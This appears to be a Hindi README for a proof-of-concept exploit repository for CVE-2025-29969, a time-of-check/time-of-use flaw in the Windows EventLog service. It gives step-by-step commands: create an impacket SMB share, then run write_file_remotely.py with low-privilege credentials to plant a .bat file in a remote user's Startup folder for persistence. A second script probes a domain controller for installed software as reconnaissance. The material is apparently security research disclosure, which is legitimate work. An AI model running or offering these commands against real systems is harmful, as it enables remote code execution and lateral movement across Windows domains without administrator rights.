
CVE-2025-29969 का शोषण
EventLogin, MS-EVEN प्रोटोकॉल में Time-of-check time-of-use भेद्यता है। यह भेद्यता निम्न-विशेषाधिकार प्राप्त उपयोगकर्ताओं को दूरस्थ मशीन पर मनमानी फ़ाइलें लिखने में सक्षम बनाती है, जिससे दूरस्थ लेखन के लिए प्रशासक खाते की आवश्यकता प्रभावी रूप से समाप्त हो जाती है।
इस रिपॉजिटरी में दो स्क्रिप्ट हैं, एक भेद्यता को हथियार बनाती है (write_file_remotely.py), और दूसरी भेद्यता के एक प्रिमिटिव का उपयोग करके जाँच करती है कि कोई दूरस्थ फ़ाइल मौजूद है या नहीं, एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में, जो उदाहरण के लिए, डोमेन में अन्य कंप्यूटरों पर स्थापित प्रोग्राम देखने के लिए उपयोगी है।
आप यहाँ पूर्ण विश्लेषण पढ़ सकते हैं:
EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows
पहले, impacket का उपयोग करके SMB शेयर बनाएँ:
impacket-smbserver -smb2support Share /tmp/safebreach
ध्यान दें, स्क्रिप्ट हार्ड-कोडेड 'Share' को शेयर नाम के रूप में उपयोग कर रही है, आवश्यकता होने पर इसे संशोधित करें।
फिर, write_file_remotely.py स्क्रिप्ट चलाएँ और सभी आवश्यक पैरामीटर शामिल करें:
उदाहरण:
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"
यह स्क्रिप्ट स्वयं भेद्यता का उपयोग नहीं करती है, यह केवल "CreateFile" प्रिमिटिव का उपयोग करती है और नेटवर्क की recon करने में आपकी सहायता कर सकती है।
उदाहरण के लिए, डोमेन में किसी दूरस्थ मशीन का Program Files निर्देशिका पूरे 'Users' समूह के लिए सुलभ है, जिसका अर्थ है कि किसी भी उपयोगकर्ता के क्रेडेंशियल्स का उपयोग करके आप जाँच सकते हैं कि किसी अन्य मशीन में कोई फ़ाइल मौजूद है या नहीं।
यह निम्नलिखित पैरामीटर स्वीकार करता है:
उदाहरण के लिए, एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता का उपयोग करके देखें कि DC (192.168.56.57) पर wireshark स्थापित है या नहीं।
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"
परिणाम:
FILE_EXISTS_AND_IS_DIRECTORY